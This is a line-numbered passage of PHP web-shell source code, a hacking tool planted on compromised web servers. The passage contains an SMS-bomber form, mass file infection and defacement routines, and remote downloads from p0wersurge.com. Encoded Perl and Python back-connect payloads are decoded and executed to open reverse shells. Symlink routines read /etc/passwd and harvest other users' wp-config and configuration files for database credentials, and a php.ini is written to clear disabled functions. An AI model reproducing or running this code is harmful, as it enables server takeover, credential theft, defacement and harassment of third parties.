739<option value='@archwireless.net'>Arch Pagers (PageNet)</option>
740<option value='@epage.arch.com'>Arch Pagers (PageNet)</option>
741<option value='@mobile.att.net'>AT&T</option>
742<option value='@txt.att.net'>AT&T2</option>
743<option value='@page.att.net'>AT&T Enterprise Paging</option>
744<option value='@mmode.com'>AT&T Free2Go</option>
745<option value='@mobile.att.net'>AT&T PCS</option>
746<option value='@dpcs.mobile.att.net'>AT&T Pocketnet PCS</option>
747<option value='@sms.beemail.ru'>BeeLine GSM</option>
748<option value='@beepwear.net'>Beepwear</option>
749<option value='@message.bam.com'>Bell Atlantic</option>
750<option value='@bellmobility.ca'>Bell Canada</option>
751<option value='@txt.bellmobility.ca'>Bell Canada2</option>
752<option value='@txt.bell.ca'>Bell Mobility (Canada)</option>
753<option value='@bellsouth.cl'>Bell South</option>
754<option value='@blsdcs.net'>Bell South2</option>
755<option value='@sms.bellsouth.com'>Bell South3</option>
756<option value='@wireless.bellsouth.com'>Bell South4</option>
757<option value='@bellsouthtips.com'>Bell South (Blackberry)</option>
758<option value='@blsdcs.net'>Bell South Mobility</option>
759<option value='@tachyonsms.co.uk'>BigRedGiant Mobile Solutions</option>
760<option value='@blueskyfrog.com'>Blue Sky Frog</option>
761<option value='@sms.bluecell.com'>Bluegrass Cellular</option>
762<option value='@myboostmobile.com'>Boost</option>
763<option value='@bplmobile.com'>BPL Mobile</option>
764<option value='@@bplmobile.com'>BPL Mobile (Mumbai, India)</option>
765<option value='@cmcpaging.com'>Carolina Mobile</option>
766<option value='@cwwsms.com'>Carolina West Wireless</option>
767<option value='@cell1.textmsg.com'>Cellular One</option>
768<option value='@cellularone.textmsg.com'>Cellular One2</option>
769<option value='@message.cellone-sf.com'>Cellular One3</option>
770<option value='@mobile.celloneusa.com'>Cellular One4</option>
771<option value='@sbcemail.com'>Cellular One5</option>
772<option value='@phone.cellone.net'>Cellular One (East Coast)</option>
773<option value='@swmsg.com'>Cellular One (South West)</option>
774<option value='@mycellone.com'>Cellular One (West)</option>
775<option value='@paging.cellone-sf.com'>Cellular One PCS</option>
776<option value='@csouth1.com'>Cellular South</option>
777<option value='@cwemail.com'>Centennial Wireless</option>
778<option value='@cvcpaging.com'>Central Vermont</option>
779<option value='@messaging.centurytel.net'>CenturyTel</option>
780<option value='@rpgmail.net'>Chennai RPG Cellular</option>
781<option value='@airtelchennai.com'>Chennai Skycell / Airtel</option>
782<option value='@gocbw.com'>Cincinnati Bell</option>
783<option value='@cingularme.com'>Cingular</option>
784<option value='@mms.cingularme.com'>Cingular2</option>
785<option value='@mycingular.com'>Cingular3</option>
786<option value='@page.cingular.com'>Cingular5</option>
787<option value='@txt.att.net'>Cingular (Now AT&T)</option>
788<option value='@clarotorpedo.com.br'>Claro (Brasil)</option>
789<option value='@ideasclaro-ca.com'>Claro (Nicaragua)</option>
790<option value='@msg.clearnet.com'>Clearnet</option>
791<option value='@comcastpcs.textmsg.com'>Comcast</option>
792<option value='@comcel.com.co'>Comcel</option>
793<option value='@sms.comviq.se'>Comviq</option>
794<option value='@cookmail.com'>Cook Paging</option>
795<option value='@corrwireless.net'>Corr Wireless Communications</option>
796<option value='@sms.mycricket.com'>Cricket</option>
797<option value='@sms.ctimovil.com.ar'>CTI</option>
798<option value='@airtelmail.com'>Delhi Aritel</option>
799<option value='@delhi.hutch.co.in'>Delhi Hutch</option>
800<option value='@page.hit.net'>Digi-Page / Page Kansas</option>
801<option value='@mobile.dobson.net'>Dobson</option>
802<option value='@sms.orange.nl'>Dutchtone / Orange-NL</option>
803<option value='@sms.edgewireless.com'>Edge Wireless</option>
804<option value='@sms.emt.ee'>EMT</option>
805<option value='@emtelworld.net'>Emtel (Mauritius)</option>
806<option value='@escotelmobile.com'>Escotel</option>
807<option value='@fido.ca'>Fido</option>
808<option value='@epage.gabrielwireless.com'>Gabriel Wireless</option>
809<option value='@sendabeep.net'>Galaxy Corporation</option>
810<option value='@webpager.us'>GCS Paging</option>
811<option value='@msg.gci.net'>General Communications Inc.</option>
812<option value='@t-mobile-sms.de'>German T-Mobile</option>
813<option value='@msg.globalstarusa.com'>Globalstar (satellite)</option>
814<option value='@bplmobile.com'>Goa BPLMobil</option>
815<option value='@sms.goldentele.com'>Golden Telecom</option>
816<option value='@epage.porta-phone.com'>GrayLink / Porta-Phone</option>
817<option value='@celforce.com'>Gujarat Celforce</option>
818<option value='@messaging.sprintpcs.com'>Helio</option>
819<option value='@text.houstoncellular.net'>Houston Cellular</option>
820<option value='@ideacellular.net'>Idea Cellular</option>
821<option value='@ivctext.com'>Illinois Valley Cellular</option>
822<option value='@page.infopagesystems.com'>Infopage Systems</option>
823<option value='@inlandlink.com'>Inland Cellular Telephone</option>
824<option value='@msg.iridium.com'>Iridium (satellite)</option>
825<option value='@rek2.com.mx'>Iusacell</option>
826<option value='@jsmtel.com'>JSM Tele-Page</option>
827<option value='@msg.koodomobile.com'>Koodo Mobile (Canada)</option>
828<option value='@mci.com'>MCI Phone</option>
829<option value='@sms.mymeteor.ie'>Meteor</option>
830<option value='@metropcs.sms.us'>Metro PCS</option>
831<option value='@clearlydigital.com'>Midwest Wireless</option>
832<option value='@mobilecomm.net'>Mobilcomm</option>
833<option value='@text.mtsmobility.com'>MTS</option>
834<option value='@sms.netcom.no'>Netcom</option>
835<option value='@messaging.nextel.com'>Nextel</option>
836<option value='@o2.co.uk'>O2</option>
837<option value='@o2imail.co.uk'>O2#2</option>
838<option value='@mmail.co.uk'>O2 (M-mail)</option>
839<option value='@orange.net'>Orange</option>
840<option value='@qwestmp.com'>Qwest</option>
841<option value='@pcs.rogers.com'>Rogers</option>
842<option value='@sms.sasktel.com'>Sasktel (Canada)</option>
843<option value='@mysmart.mymobile.ph'>Smart Telecom</option>
844<option value='@messaging.sprintpcs.com'>Sprint</option>
845<option value='@tms.suncom.com'>Sumcom</option>
846<option value='@tmomail.net'>T-Mobile</option>
847<option value='@t-mobile.uk.net'>T-Mobile (UK)</option>
848<option value='@t-d1-sms.de'>T-Mobile Germany</option>
849<option value='@txt.att.net'>Tracfone</option>
850<option value='@mmst5.tracfone.com'>Tracfone (prepaid)</option>
851<option value='@vtext.com'>Verizon</option>
852<option value='@vmobl.com'>Virgin Mobile</option>
853<option value='@vmobile.ca'>Virgin Mobile (Canada)</option>
854<option value='@vodafone.net'>Vodafone UK</option>
855</select>
856</td>
857</tr>
858<tr>
859<td>Amount Of Messages To Send:</td>
860<td><input type='text' name='numberof' size='10' class='text'></td>
861</tr>
862<tr>
863<td>From:</td>
864<td><input type='text' name='from' class='text'></td>
865</tr>
866<tr>
867<td>Subject:</td>
868<td><input type='text' size='85' class='text' name='subject'></td>
869</tr>
870</table>
871Message Content:<br>
872<textarea rows='20' cols='150' name='message_content' style='color:#00ff00'>
873</textarea><br>
874<input type='submit' name='do_bomb_sms' value='Bomb'><br>
875</form><br></font><br>";
876}
877?>
878<?php
879//Install MySQL Tool
880if (isset($_GET['installMySQL'])) {
881 echo "<center>
882<font size='4'>
883<a href='?msd1' class='navbar'>Install MySQL Dumper v2.0 By: Plum</a>
884<br>
885<br>
886<a href='?msd2' class='navbar'>Install MySQL Dumper v1.24.4 (Original MSD)</a>
887</font>
888</center>
889<br>";
890}
891//MSD 1 stuff
892if (isset($_GET['msd1'])) {
893 echo "<center>
894<font color='#14ab00' size='3'>
895Directory to install to:<br>
896If directory does not exist it will attempt to create it.
897<form action='' method='post'>
898<input type='text' name='msd1dir' class='text' size='50' value='$dir/msd'>
899<input type='submit' name='installmsd1' value='Install'>
900<form>
901</font>
902</center>
903<br>";
904}
905if (isset($_POST['installmsd1'])) {
906 $msd1dir = rtrim($_POST['msd1dir'], "/");
907 $msd1dir2 = "$msd1dir/msdv2.zip";
908 if (!is_dir($msd1dir)) {
909 if (!mkdir($msd1dir, 0777)) {
910 error("Failed to make directory $msd1dir");
911 }
912 }
913 $link = file_get_contents("http://p0wersurge.com/msdv2.zip");
914 if (file_put_contents($msd1dir2, $link)) {
915 unzip($msd1dir2, $msd1dir);
916 } else {
917 error("Could not write to $msd1dir");
918 }
919}
920//MSD 2 stuff
921if (isset($_GET['msd2'])) {
922 echo "<center>
923<font color='#14ab00' size='3'>
924Directory to install to:<br>
925If directory does not exist it will attempt to create it.
926<form action='' method='post'>
927<input type='text' name='msd2dir' class='text' size='50' value='$dir/msd'>
928<input type='submit' name='installmsd2' value='Install'>
929<form>
930</font>
931</center>
932<br>";
933}
934if (isset($_POST['installmsd2'])) {
935 $msd2dir = rtrim($_POST['msd2dir'], "/");
936 $msd2dir2 = "$msd2dir/msd.zip";
937 if (!is_dir($msd2dir)) {
938 if (!mkdir($msd2dir, 0777)) {
939 error("Failed to make directory $msd2dir");
940 }
941 }
942 $link = file_get_contents("http://p0wersurge.com/msd.zip");
943 if (file_put_contents($msd2dir2, $link)) {
944 unzip($msd2dir2, $msd2dir);
945 } else {
946 error("Could not write to $msd2dir");
947 }
948}
949?>
950<?php
951//Mass file infect
952if (isset($_POST['do_mass_infect'])) {
953 $masscode = " " . $_POST['massinfect_code'] . "\n";
954 $inf_dir = $_POST['infect_dir'];
955 $infcustom_dir = $_POST['cinfect_dir'];
956 $infcustom_dir = rtrim($infcustom_dir, "/");
957 $failed = 0;
958 $success = 0;
959 if (empty($masscode)) {
960 error("You must enter a code to infect files with!");
961 } elseif (empty($infcustom_dir) && $inf_dir == "custom") {
962 error("You must enter a custom directory when using the Custom option!");
963 } else {
964 if ($inf_dir == "root") {
965 $mddir = $rootdir;
966 }
967 if ($inf_dir == "custom") {
968 $mddir = $infcustom_dir;
969 }
970 foreach (files($mddir) as $key => $file) {
971 $file2 = trim($file, ".");
972 $getinf_file = file_get_contents($file2);
973 if ("$file2" == "$dir/$script2") {
974 echo "";
975 } else {
976 if (file_put_contents("$file2", $masscode) && file_put_contents("$file2", $getinf_file, FILE_APPEND)) {
977 echo "<font color='green'><b>Successfully infected file: $file2</b></font><br>";
978 $success++;
979 } else {
980 echo "<font color='red'><b>Failed to infect file: $file2</b></font><br>";
981 $failed++;
982 }
983 }
984 }
985 echo "<font color='#14ab00'><b>$success files successfully infected! ^_^<br>Failed to infect $failed files! :( </b></font><br>";
986 }
987}
988if (isset($_GET['massinfect'])) {
989 $example = "<?php system() ?>";
990 $example = htmlspecialchars($example);
991 $example2 = "<script>alert()</script>";
992 $example2 = htmlspecialchars($example2);
993 echo "<center>
994<font color='#14ab00'>
995<form action='' method='post'>
996Directory to start infect from:<br>
997<select name='infect_dir'>
998<option value='root'>Root</option>
999<option value='custom'>Custom</option>
1000</select><br>
1001Custom Directory: <input class='text' type='text' name='cinfect_dir' size='40'><br>
1002This is great for infecting mass files with javascript scripts or php scripts<br>
1003It will append the code to the top of each file.<br>
1004Example:<br>
1005$example<br>
1006$example2<br>
1007Infect code:<br>
1008<textarea rows='20' cols='150' name='massinfect_code' style='color:#000'>
1009</textarea><br>
1010This will not infect this shell.<br>
1011<input type='submit' name='do_mass_infect' value='Infect'><br>
1012</form>
1013</font>
1014</center>";
1015}
1016?>
1017<?php
1018//Mass Defacer
1019if (isset($_POST['do_mass_deface'])) {
1020 if (get_magic_quotes_gpc()) {
1021 $mass_source = stripslashes($_POST['massdeface_source']);
1022 } else {
1023 $mass_source = $_POST['massdeface_source'];
1024 }
1025 $def_dir = $_POST['deface_dir'];
1026 $custom_dir = $_POST['custom_dir'];
1027 $custom_dir = rtrim($custom_dir, "/");
1028 $failed = 0;
1029 $success = 0;
1030 if (empty($mass_source)) {
1031 error("You must enter a source!");
1032 } elseif (empty($custom_dir) && $def_dir == "custom") {
1033 error("You must enter a custom directory when using the Custom option!");
1034 } else {
1035 if ($def_dir == "root") {
1036 $mddir = $rootdir;
1037 }
1038 if ($def_dir == "custom") {
1039 $mddir = $custom_dir;
1040 }
1041 foreach (files($mddir) as $key => $file) {
1042 $file2 = trim($file, ".");
1043 if ("$file2" == "$dir/$script2") {
1044 echo "";
1045 } else {
1046 if (file_put_contents("$file2", $mass_source)) {
1047 echo "<font color='green'><b>Successfully defaced file: $file2</b></font><br>";
1048 $success++;
1049 } else {
1050 echo "<font color='red'><b>Failed to deface file: $file2</b></font><br>";
1051 $failed++;
1052 }
1053 }
1054 }
1055 echo "<font color='#14ab00'><b>$success files successfully defaced!<br>Failed to deface $failed files!</b></font><br>";
1056 }
1057}
1058if (isset($_GET['massdeface'])) {
1059 echo "<center>
1060<font color='#14ab00'>
1061<form action='' method='post'>
1062Directory to start deface from:<br>
1063<select name='deface_dir'>
1064<option value='root'>Root</option>
1065<option value='custom'>Custom</option>
1066</select><br>
1067Custom Directory: <input class='text' type='text' name='custom_dir' size=security'40'><br>
1068Source of deface:<br>
1069<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
1070</textarea><br>
1071This will not deface this shell.<br>
1072<input type='submit' name='do_mass_deface' value='Deface'><br>
1073</form>
1074</font>
1075</center>";
1076}
1077?>
1078<?php
1079if(isset($_GET['perlbackconnect']))
1080{ ?>
1081<font size=2 face="comic sans ms" color=white>
1082<p><form method=POST action="">
1083Client ip:<input type=text name=ip value=<?php echo $_SERVER['REMOTE_ADDR'];?>>
1084Connection Port:<input type=text name=port /><p>
1085<input type=submit name=sbm value="Connect" /></form>
1086</font>
1087<?php
1088
1089
1090if(isset($_POST['sbm']))
1091{
1092 $r=$_POST["ip"];
1093 $s=$_POST["port"];
1094 $p1 ='hVNhb5swEP0eKf/hSqsFpNCE9sOkRFTLUtKibU0FJJrEUGTgWlCJHWGzJZr234dNqBKlVY0E9rtnv3e+4/xsUPFyEOd0sMGy6Ha6nYojuPPRyGfJC4qxhC74jgtcgw09RY0Jz3pNZOLdTe0v9Xup1psypwI0ME3bDsOvJHmZMkoxEeBnWBRRZNumCb/onhCzLbA/FFOIdxAgWYNL05wfUWsyaOrw/Al0JXhmXxnwV0KwF1xw8owjuBhCeM+4iCB8ZGX9kdubzZDmCJqzVSTr6vPlsH4ssK6ta2g5/9r8D3KXy1le4D2haYEK4iqq+/PpNyfow+Ns5T7IiQRWfuA5kx99eEaxKZlg8Y6SNeo9kWx6hgGsVEb2tkMzggUlcYEgGHjIWfEbQWbQWkqa63sVk9okTctVTtVdLEMr6kNOUayIYC02jIwPtNqyHGo1VZazRs28IZVgT0XFM91QDLZBqvvBrfvQB+3mU0PTjmPzRdB/L+Z43kms9Sfr/Nb4qJUOvetaRTnWWbl+MHO/O2No1v5k6UgMxphkrAbrkoBJYPw6VQF10t5W28nv+ak7d37Suf5J5761N61SvFSjQMEhwy2ILOfAs1zAz1s4POAou/1/2Bg8d+azbuc/';
1095
1096 $dec= gzinflate(base64_decode($p1));
1097 $fname = fopen('backconn.pl','w');
1098 fwrite($fname,$dec);
1099 $d="backconn.pl";
1100 $ch="chmod +x ".$d ;
1101 $permission= system($ch);
1102
1103 $z="perl ".$d." ".$r." ".$s;
1104 $run= system($z);
1105
1106 }
1107
1108}
1109?>
1110<?php
1111if(isset($_GET['pythonbackconnect']))
1112{
1113 ?>
1114<form method=POST>
1115Client ip:<input type=text name=pyt value=<?php echo $_SERVER['REMOTE_ADDR'];?>>
1116port:<input type=text name=port /><p>
1117<input type=submit name=pyb value="Connect" /></form>
1118</font>
1119<?php
1120}
1121?>
1122<?php
1123if(isset($_POST['pyb']))
1124{
1125 $r=$_POST["pyt"];
1126 $s=$_POST["port"];
1127 $py = 'fVLfS8MwEH4X/B9u9WEptJ1O8UEouI0JIjpwe+vK6I/bGpYmJUnV+tebrF2dIEsgucv33eXj7q4Go1rJUUr5qGp0IfjlRbtpWQmpQTXKAyWyPWoPhLXrtJIiQ6WOzEIoDaFlBoncfUQ3sX09RIdAuSY9Mo7dY1CbMlCoc9wmNdOalihqTe6ve45BIM2I+2AdAC2bzgKjaG+/7JIcLtJ5k6fN89t85XXucjF72SxX7/PJq3sSHWSCc8w0IVa+Z9W6f3CFPCfD4fD41q4cP5CJCiWILeiCKlCZpJUGY6V3TCffiXzclQll5oMS1vxv+Ony/TCMoqn4gsUnxxymDawwKeGZ53RZIGNxHIa+b3KsudHRixMqyOtqTKzILWXIBXG96/PwzXl4fB6+/S2M1WUL3w9BkCWMkcg5TJAqHM/xqRN3AfiVoalN14muw30PK2mGA5xoEMOsbQYVHCwrB8Nz/suBUgrpAf6XZG4x+CyMbOi6S/nOMeyWbE87Tj8=';
1128
1129 $dec= gzinflate(base64_decode($py));
1130 $fname = fopen('backconn.py','w');
1131 fwrite($fname,$dec);
1132 $d="backconn.py";
1133 $ch="chmod +x ".$d ;
1134 $permission= system($ch);
1135
1136 $z="python ".$d." ".$r." ".$s;
1137 $run= system($z);
1138
1139 }
1140?>
1141<?php
1142//echo out files
1143echo "<table border='1' width='100%' frame='void'>
1144<tr>
1145<th>
1146Current Directory: ";
1147$ex = explode("/", $dir);
1148for ($p = 0;$p < count($ex);$p++) {
1149 @$linkpath.= $ex[$p] . '/';
1150 $linkpath2 = rtrim($linkpath, "/");
1151 echo "<a href=http://$domain$script?path=$linkpath2>$ex[$p]</a>/";
1152}
1153echo "</th>
1154</tr>
1155</table>
1156<div id='hover'>
1157<table border='1' width='100%'>
1158<form action='' method='post' id='checkboxall'>
1159<tr>
1160<th>Directory/File Name</th>
1161<th>Owner/Group</th>
1162<th>Permissions</th>
1163<th>Writeable</th>
1164<th>Size</th>
1165<th>Last Modified</th>
1166<th>Delete</th>
1167<th>Rename</th>
1168<th>Mass</th>
1169</tr>
1170";
1171foreach ($direcs as $d) {
1172 $downer = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$d")) : fileowner("$dir/$d");
1173 $dgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$d")) : filegroup("$dir/$d");
1174 if (is_array($downer)) {
1175 $downer = $downer['name'];
1176 }
1177 if (is_array($dgroup)) {
1178 $dgroup = $dgroup['name'];
1179 }
1180 $dperms = substr(base_convert(fileperms("$dir/$d"), 10, 8), 2);
1181 $dwrite = is_writeable("$dir/$d") ? "<font color='black'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
1182 $dsize = "Directory";
1183 $dtime = date("F d Y g:i:s", filemtime("$dir/$d"));
1184 echo "<tr>
1185<td><a href='http://$domain$script?path=$dir/$d'>$d</a></td>
1186<td style='text-align: center;'>$downer/$dgroup</td>
1187<td style='text-align: center;'>$dperms</td>
1188<td style='text-align: center;'>$dwrite</td>
1189<td style='text-align: center;'>$dsize</td>
1190<td style='text-align: center;'>$dtime</td>
1191<td style='text-align: center;'><a href='http://$domain$script?deldir=$dir/$d'>Delete</a></td>
1192<td style='text-align: center;'><a href='http://$domain$script?rendir=$dir&old=$d'>Rename</a></td>
1193<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$d'></td>
1194</tr>";
1195}
1196foreach ($files as $f) {
1197 $fowner = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$f")) : fileowner("$dir/$f");
1198 $fgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$f")) : filegroup("$dir/$f");
1199 if (is_array($fowner)) {
1200 $fowner = $fowner['name'];
1201 }
1202 if (is_array($fgroup)) {
1203 $fgroup = $fgroup['name'];
1204 }
1205 $fperms = substr(base_convert(fileperms("$dir/$f"), 10, 8), 2);
1206 $fwrite = is_writeable("$dir/$f") ? "<font color='black'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
1207 $fsize = ByteConversion(filesize("$dir/$f"));
1208 $ftime = date("F d Y g:i:s", filemtime("$dir/$f"));
1209 $zip_file = explode(".", $f);
1210 $zip_file2 = end($zip_file);
1211 echo "<tr>";
1212 if ($zip_file2 == "zip") {
1213 echo "<td><a href='http://$domain$script?unzipfile=$dir/$f'>$f</td>";
1214 } else {
1215 echo "<td><a href='http://$domain$script?editfile=$dir/$f'>$f</td>";
1216 }
1217 echo "<td style='text-align: center;'>$fowner/$fgroup</td>
1218<td style='text-align: center;'>$fperms</td>
1219<td style='text-align: center;'>$fwrite</td>
1220<td style='text-align: center;'>$fsize</td>
1221<td style='text-align: center;'>$ftime</td>
1222<td style='text-align: center;'><a href='http://$domain$script?delfile=$dir/$f'>Delete</a></td>
1223<td style='text-align: center;'><a href='http://$domain$script?renfile=$dir&old=$f'>Rename</a></td>
1224<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$f'></td>
1225</tr>";
1226}
1227echo "</table></div>";
1228echo "<div id='bottom'><font color='#14ab00'>With all selected:</font><br>
1229<input type='button' onclick='checkall();' value='Select/Unselect All'>
1230<select name='mass_action'>
1231<option value='Delete'>Delete</option>
1232<option value='chmod'>chmod</option>
1233</select>
1234<input type='text' name='chmod_value' class='text' value='chmod value' size='9' id='ch' onfocus='removeValue()'>
1235<input type='submit' name='mass_files'><br></div>";
1236echo "</form>";
1237closedir();
1238?>
1239<script type="text/javascript">/*<![CDATA[*/function removeValue(){document.getElementById("ch").value=""}checked=false;function checkall(a){var c=document.getElementById("checkboxall");if(checked==false){checked=true}else{checked=false}for(var b=0;b<c.elements.length;b++){c.elements[b].checked=checked}};/*]]>*/</script>
1240<?php
1241$wr = is_writeable($dir) ? "<font color='black'><b>[ Writeable ]</b></font>" : "<font color='red'><b>[ Non Writeable ]</b></font>";
1242echo "<table border='1' width='100%' frame='void'>
1243<tr>
1244<td>
1245<center>
1246Create directory:<br>
1247<form action='' method='post'>
1248<input type='text' class='textround' name='create_dir' value='$dir/newdir' size='50'>
1249<input type='submit' name='do_create_dir' value='Create'><br>
1250$wr
1251</form>
1252</center>
1253</td>
1254<td>
1255<center>
1256Create file:<br>
1257<form action='' method='post'>
1258<input type='text' class='textround' name='create_file' value='$dir/newfile.php' size='50'>
1259<input type='submit' name='do_create_file' value='Create'><br>
1260$wr
1261</form>
1262</center>
1263</td>
1264</tr>
1265<tr>
1266<td>
1267<center>
1268Go to directory:<br>
1269<form action='' method='post'>
1270<input type='text'class='textround' name='go_dir' value='/tmp' size='50'>
1271<input type='submit' name='do_go_dir' value='Go'><br>
1272</form>
1273</center>
1274</td>
1275<td>
1276<center>
1277Edit file:<br>
1278<form action='' method='post'>
1279<input type='text' class='textround' name='go_edit_file' value='$dir/index.php' size='50'>
1280<input type='submit' name='do_go_edit' value='Edit'><br>
1281</form>
1282</center>
1283</td>
1284</tr>
1285<tr>
1286<td>
1287<center>
1288<form action='' method='post' enctype='multipart/form-data'>
1289Upload to location:<br>
1290<input type='text' class='text' style='width: 300px' value='$dir/' name='upload_location'></br><input type='file' name='upload_file'>
1291<input type='submit' value='Upload' name='do_upload_file'><br>
1292$wr
1293</form>
1294</center>
1295</td>
1296<td>
1297<center>
1298<form action='' method='post'>
1299wget file:<br>
1300<input type='text' name='wget_file' class='text' size='50' value='http://'>
1301<input type='submit' name='do_wget_file' value='wget'>
1302</form>
1303</center>
1304</td>
1305</tr>
1306<table border='1' frame='void' width='100%'>
1307<tr>
1308<td>
1309<center>
1310<form action='' method='post'>
1311Execute Command:<br>
1312<input type='text' class='text' name='exe_command' size='60'>
1313<input type='submit' name='do_exe_command' value='Execute'><br>
1314</form>
1315</center>
1316</td>
1317</tr>
1318</table>
1319<br><br><br>";
1320?>
1321<?php
1322//Salt generator
1323function gen_salt($length) {
1324 $characters = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
1325 $i = 0;
1326 $salt = "";
1327 while ($i < $length) {
1328 $arrand = array_rand($characters, 1);
1329 $salt.= $characters[$arrand];
1330 $i++;
1331 }
1332 return $salt;
1333}
1334?>
1335<h2><p>Symlink Killer ++</p></h2>
1336<form method=post><font color=white size=2 face="comic sans ms">Click this button to generate PHP.ini</font><p>
1337<input type=submit name=ini value="Generate PHP.ini" /></form>
1338<form method=post><font color=white size=2 face="comic sans ms">Click this button to extract usernames for Symlink</font><p>
1339<input type=submit name="usre" value="Extract usernames" /></form>
1340<?php
1341 if(isset($_POST['ini']))
1342 {
1343
1344 $r=fopen('php.ini','w');
1345 $rr=" disbale_functions=none ";
1346 fwrite($r,$rr);
1347 $link="<a href=php.ini><font color=red size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
1348 echo $link;
1349
1350 }
1351
1352
1353
1354 ?>
1355<?php
1356 error_reporting(0);
1357 echo "<font color=red size=2 face=\"comic sans ms\">";
1358 if(isset($_POST['su']))
1359 {
1360 mkdir('security',0777);
1361$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1362$g = fopen('security/.htaccess','w');
1363fwrite($g,$rr);
1364$security = symlink("/","security/root");
1365 $rt="<a href=security/root><font color=white size=3 face=\"comic sans ms\"> Success </font></a>";
1366 echo "Check link given below for / folder symlink <br><u>$rt</u>";
1367
1368 $dir=mkdir('SECURITY',0777);
1369 $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1370 $f = fopen('SECURITY/.htaccess','w');
1371
1372 fwrite($f,$r);
1373 $consym="<a href=SECURITY/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
1374 echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
1375
1376 $usr=explode("\n",$_POST['user']);
1377 $configuration=array("wp-config.php","wordpress/wp-config.php","web/wp-config.php","wp/wp-config.php","press/wp-config.php","wordpress/beta/wp-config.php","news/wp-config.php","new/wp-config.php","blogs/wp-config.php","home/wp-config.php","blog/wp-config.php","protal/wp-config.php","site/wp-config.php","main/wp-config.php","test/wp-config.php","wp/beta/wp-config.php","beta/wp-config.php","joomla/configuration.php","protal/configuration.php","joo/configuration.php","cms/configuration.php","site/configuration.php","main/configuration.php","news/configuration.php","new/configuration.php","home/configuration.php","configuration.php","SSI.php","forum/SSI.php","forum/inc/config.php","forum/includes/config.php","upload/includes/config.php","cc/includes/config.php","vb/includes/config.php","vb3/includes/config.php","cpanel/configuration.php","panel/configuration.php","ubmitticket.php","manage/configuration.php","myshop/configuration.php","beta/configuration.php","includes/config.php","lib/config.php","conf_global.php","inc/config.php","icl/config.php","include/db.php","include/config.php","includes/functions.php","includes/dist-configure.php","connect.php","mk_conf.php","config/koneksi.php","system/sistem.php","config.php","Settings.php","settings.php","sites/default/settings.php","smf/Settings.php","forum/Settings.php","forums/Settings.php","host/configuration.php","hosting/configuration.php","hosts/configuration.php","zencart/includes/dist-configure.php","shop/includes/dist-configure.php","whm/configuration.php","whmc/configuration.php","whmcs/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","order/configuration.php","support/configuration.php","supports/configuration.php","oscommerce/includes/configure.php","oscommerces/includes/configure.php","shopping/includes/configure.php","sale/includes/configure.php","config.inc.php","amember/config.inc.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configurtion.php","billing/configuration.php","billings/configuration.php","admin/conf.php","datas/config.php","e107_config.php","/default/settings.php","admin/config.php");
1378 foreach($usr as $uss )
1379 {
1380 $us=trim($uss);
1381
1382 foreach($configuration as $c)
1383 {
1384 $rs="/home/".$us."/public_html/".$c;
1385 $r="SECURITY/".$us." .. ".$c;
1386 symlink($rs,$r);
1387
1388 }
1389
1390 }
1391
1392
1393 }
1394
1395
1396
1397 ?>
1398<?php
1399 if(isset($_POST['usre'])){
1400 ?><form method=post>
1401<textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
1402foreach($users as $user)
1403{
1404$str=explode(":",$user);
1405echo $str[0]."\n";
1406}
1407
1408?>
1409 </textarea><br><br>
1410<input type=submit name=su value="Start Extract" /></form>
1411<?php } ?>
1412<form method=post>
1413<font color=white size=2 face="comic sans ms">Click this button to open manual symlink form</font><p>
1414<input type=submit name=man value="Open Manual symlink form"/></form>
1415<?php
1416 if(isset($_POST['man']))
1417{
1418?>
1419<form method=post>file link that you want symlink:-<input type=text name=dli value="/home/user/public_html/config.php">  file name with which you want represent symlink :-<input type=text name=fna value="owned.txt"><br>use .txt(owned.txt) or no extension(owned) for file which will represent symlink<br><br><input type=submit name=manual value="Lets do it "></form>
1420<?php
1421}
1422 ?>
1423<?php
1424 error_reporting(0);
1425 if(isset($_POST['manual']))
1426 {
1427 $dlink=trim($_POST['dli']);
1428 $fna=trim($_POST['fna']);
1429 mkdir('SECURITY',0777);
1430 $acc = " Options all \n DirectoryIndex security.html \n Require None \n Satisfy Any";
1431$ha = fopen('SECURITY/.htaccess','w');
1432fwrite($ha,$acc);
1433$final="SECURITY/".$fna;
1434symlink($dlink,$final);
1435
1436echo "<br>File link for Symlink ".$dlink." link >>> <a href=".$final."><font color=red size=3>is here</font></a>";
1437}
1438 ?>
1439<form method=post>
1440<font color=white size=2 face="comic sans ms">Click this button for running Perl based symlink </font><p>
1441<input type=submit name=passx value="Eval"><p></form>
1442<?php
1443if(isset($_POST['passx']))
1444{
1445 ?>
1446<textarea style="background:black;color:black" rows=20 cols=50 name=usernames><?php $users=file("/etc/passwd");
1447foreach($users as $user)
1448{
1449$str=explode("\n",$user);
1450echo $str[0]."\n";
1451}
1452
1453?></textarea>
1454<?php
1455}
1456
1457
1458
1459?>
1460<form method=post>
1461<font size=5 color=white> <input type=submit name=perl value="Configuration File Killer"> </font></form>
1462<p>
1463<?php
